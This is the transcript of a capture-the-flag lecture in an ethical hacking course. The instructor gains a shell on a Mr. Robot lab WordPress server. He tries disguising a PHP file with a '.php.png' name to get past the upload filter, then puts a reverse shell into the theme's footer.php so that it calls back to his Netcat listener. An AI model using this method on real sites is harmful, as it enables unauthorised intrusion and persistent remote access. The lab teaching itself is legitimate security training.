The course is part of this learning path
In this course, we explore brute force attacks, hacking WordPress, changing users, and suid privilege escalation. We'll do this through a CTF (capture the flag) ethical hacking game called Mr. Robot.
Hi, within this lecture, we're going to try and hack into the server. We are using WordPress vulnerabilities or some kind of tricks over here. So, what I'm going to do, I'm going to go into the 'Library' and see if we can upload something over here. The basic trick is that if you can upload a php-reverse-shell over there, then you can get a shell back. This is what happens mainly in the WordPress CTFs. I'm going to try that. But, I don't know if it's going to work or not. So, I'm going to search for 'php reverse shell cheat sheet' like we have done in the Python before in the previous section. Now, of course, I'm going to go into the 'pentestmonkey' one more time. And say, yes, let's go over here. And I'm just going to find the PHP one-liner. So, this is good. And as you can see, it says that, "If you want to .php file to upload, see the more featureful and robust php-reverse-shell." This is just a one-liner that you run in the comment, in the terminal. But, we don't need that. We actually need a file to upload so that we can test if we can actually upload a .php file to server. So, come over here and just find the php-reverse-shell. And over there, I believe, we should have some download button over there. It says that, don't forget to change the ip and port, and listen with Netcat in another terminal, and I just make sure you run the PHP code. I don't know, we can do that yet. We're going to try and see. So, I'm going to 'Download' the php-reverse-shell. So, let's come over here. And let's see. Let's go to 'Downloads' and here we go. Let's see over this and PHP. Let me search for PHP. So, I cannot seem to find it. Here you go. And this is, for some reason, it's tar.gz. Let me just take it into the 'CTF' folder, under MrRobot, I'm going to paste this over here. So, this is tar.gz. Let me try to just unzip it from here. Like we can use 'gzip' to just unzip this or let me just run 'ls -la'. Here you go. This should have been gzip, but let me try this. So, I'm going to write 'php-reverse-shell-1.0.tar.gz'. It says that, it's already has gz. Yes, we have to specify. We're going to decompile this. It says that, "unexpected end of file." So, let me 'double-click' on this one. Yes, it doesn't really work. It is like an empty file. I believe, there was something wrong with downloading it. So, let me try this one more time. I'm going to try with 'gzip2', but we don't have gzip2, for some reason. Let me just run 'gzip --help' and see. Yes, we are doing this right, we're decompressing this. I believe, there is something wrong with the file itself. So, let me try and figure out how to proceed over here. So, if we can try to download this one more time and here you go. Kali says that this file contains malware, so I made it unavailable. If you click on this icon over here, you can just say, 'Open', and it will open that file for you. So, Kali thought that this is a malware or something like that. So, I'm going to delete it. But, just take this php-reverse-shell out of it and put it over the folder over here. So, we don't need the rest of it. I'm going to just 'Move to Trash' and come over here and find your PHP file. Open this with any kind of editor, like Leafpad or anything you have really. I'm going to choose 'Geany', but you can't even open this with nano itself. Because all we need to do is just change the IP address and change the port address. So, for the IP address, I'm going to write my own Kali Linux IP address, which is 10.0.2.4, in my case. And I'm not going to even change the ports. So, the port is 1234, which is perfectly fine for me. So, I'm going to close this down and I have a php-reverse-shell over here. So, if I can run this on the WordPress, then I can run this on the server that holds the WordPress. I can get a reverse shell back. So, let me see if I can upload this to the WordPress. I'm going to come over here to 'MrRobot' and find my shell and just 'double-click' on it and here you go. It says that, "This file type is not permitted for security reasons." which makes sense. So, I'm going to copy this one and paste it over here and try to just play with it a little bit. What we can do? We can just rename this and change the extension a little bit. I'm going to call this 'myshell.php.png'. So, it looks like a PNG file, but it's actually a PHP file. Even though we can upload this, maybe it won't get run by the server. But again, it's worth a shot. Here you go. It doesn't let us do that. So again, even though this is a PNG extension, it doesn't allow us to upload this. So, I'm going to go to 'Google' and just find a G pack or PNG file. I'm going to search for 'metallica' since this is my favorite band. You can do this with your own favorite band as well. I'm going to just 'Save' an image over here. I'm going to call this 'metallica.jpg'. And apparently, I already have this on my Downloads. So, let me come over here and find that. And try to see if we can actually upload anything over here. And apparently, we can. So, as you can see, this picture got uploaded to the server and we cannot do that. We cannot just upload PHP files over here. So, I'm going to change this to something, like php.jpg, to see if there's something wrong with the PNG file. And if it's okay with the JPG file, I'm going to come over here and just choose this one. Here you go, it doesn't let us. So, the filtering works very well. As you can see, it doesn't let us upload PHP files. So, what I'm going to do? I'm going to go for 'Appearance' to 'Editor', and I'm just going to change the PHP codes themselves. So, I'm going to just change the PHP codes and just copy and paste the reverse shell to here. So, over here, we're going to have to find a thing, like a footer or 404 template in order to paste our code. So, it won't get recognized by editor or it won't get recognized by the developer and it gets called. It gets executed every time we visit the WordPress page. So, something like a footer or you can just put it in the 404 template and just go for a page that doesn't exist. It's a good strategy as well. So, I'm going to come over here to our web server, which is 10.0.2.15. And over here, we don't even see something like real WordPress blog or something like that. So, maybe we can try to find something related to WordPress so that we can get to see the footer and header. So, let me see this is footer.php. And there is an archive.php, comments.php. We can just try to go to 404.php or maybe we can just trigger this from the server as well. What we really need to do is just find an optimized place to put this code into. So, I'm just going to try with footer. And we can just come over here and just run the footer.php. And here we go, we see a blog. So, we can just reload this file and see if this works or not. So, before reloading, of course, we're going to change the content of this footer. So, this is the footer itself, I believe. It really doesn't matter. All I'm going to do, I'm just going to copy the reverse shell code and paste it over here and see if that works or not. And you can just delete this 'footer.php'. I'm just going to copy this so that if we break something, we can just always come back and paste it back. I'm going to put it under my 'notes.txt'. And I'm just going to paste it over here if I can. No, let me try one more time. No, it doesn't work. Let me try 'Paste Clipboard'. Here you go. It works. Now, this is over here. So, if I break something, I can go back and just take it from there. Now, let me delete everything here. Delete everything in the footer.php and just open my reverse shell and copy everything from here. And say, 'Copy' and just come back and paste it over there. So, my footer is a reverse shell right now. So, if I can update this file, as you can see, it says, "File edited successfully." Then, let me just try and listen for incoming connections from port 1234. So, we're doing that with Netcat. And let me just 'Refresh' this and here you go. The footer disappeared, but it should send the connection back and here you go. We are inside of the server. We managed to act the server. If I run 'id', we are daemon. And if we run, 'whoami', here you go. Of course, we are not root. It is not wise to expect to be root when we first hack into, but we're going to try and escalate our privileges. So, here we go. We can see some files. We can browse here. We can see what kind of things there are inside of the /etc/passwd and stuff. But, we hacked into the server. That's what's important. I'm going to stop here. And within the next lecture, we can see what we're going to do to escalate our privileges and become root.
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.